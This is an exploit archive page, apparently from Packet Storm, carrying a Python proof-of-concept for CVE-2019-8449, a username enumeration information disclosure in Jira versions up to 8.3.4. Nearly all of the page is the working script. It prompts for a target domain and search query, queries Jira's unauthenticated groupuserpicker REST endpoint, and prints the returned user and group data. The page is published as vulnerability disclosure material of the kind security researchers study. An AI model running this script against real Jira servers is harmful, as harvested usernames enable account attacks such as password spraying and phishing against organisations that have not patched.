what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Jira 8.3.4 Information Disclosure

Jira 8.3.4 Information Disclosure
Posted Feb 2, 2020
Authored by Mufeed VH

Jira version 8.3.4 suffers from a username enumeration information disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2019-8449
SHA-256 | 4f9bd16fa47944747d6a3950c8b2cfec6eb77614b502ff649390d94798c33c62

Jira 8.3.4 Information Disclosure

Change Mirror Download
# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
# Date: 2019-09-11
# Exploit Author: Mufeed VH
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Version: 8.3.4
# Tested on: Pop!_OS 19.10
# CVE : CVE-2019-8449

# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796

#!/usr/bin/env python


__author__ = "Mufeed VH (@mufeedvh)"

import os
import requests


class CVE_2019_8449:
def ask_for_domain(self):
domain = raw_input("[>] Enter the domain of Jira instance: => ")
if domain == "":
print("\n[-] ERROR: domain is required\n")
self.ask_for_domain()
self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)

def ask_for_query(self):
self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
if self.query == "":
print("\n[-] ERROR: The query parameter is required\n")
self.ask_for_query()

def exploit(self):
self.ask_for_domain()
self.ask_for_query()

maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")

params = {
'query': self.query,
'maxResults': maxResults,
'showAvatar': showAvatar,
'fieldId': fieldId,
'projectId': projectId,
'issueTypeId': issueTypeId,
'avatarSize': avatarSize,
'caseInsensitive': caseInsensitive,
'excludeConnectAddons': excludeConnectAddons
}

send_it = requests.get(url = self.url, params = params)

try:
response = send_it.json()
except:
print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
quit()

print("\n<========== RESPONSE ==========>\n")
print(response)
print("\n<==============================>\n")

if __name__ == '__main__':
os.system('cls' if os.name == 'nt' else 'clear')

print('''
================================================
| |
| CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
| Proof of Concept By: Mufeed VH [@mufeedvh] |
| |
================================================
''')

CVE_2019_8449().exploit()
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close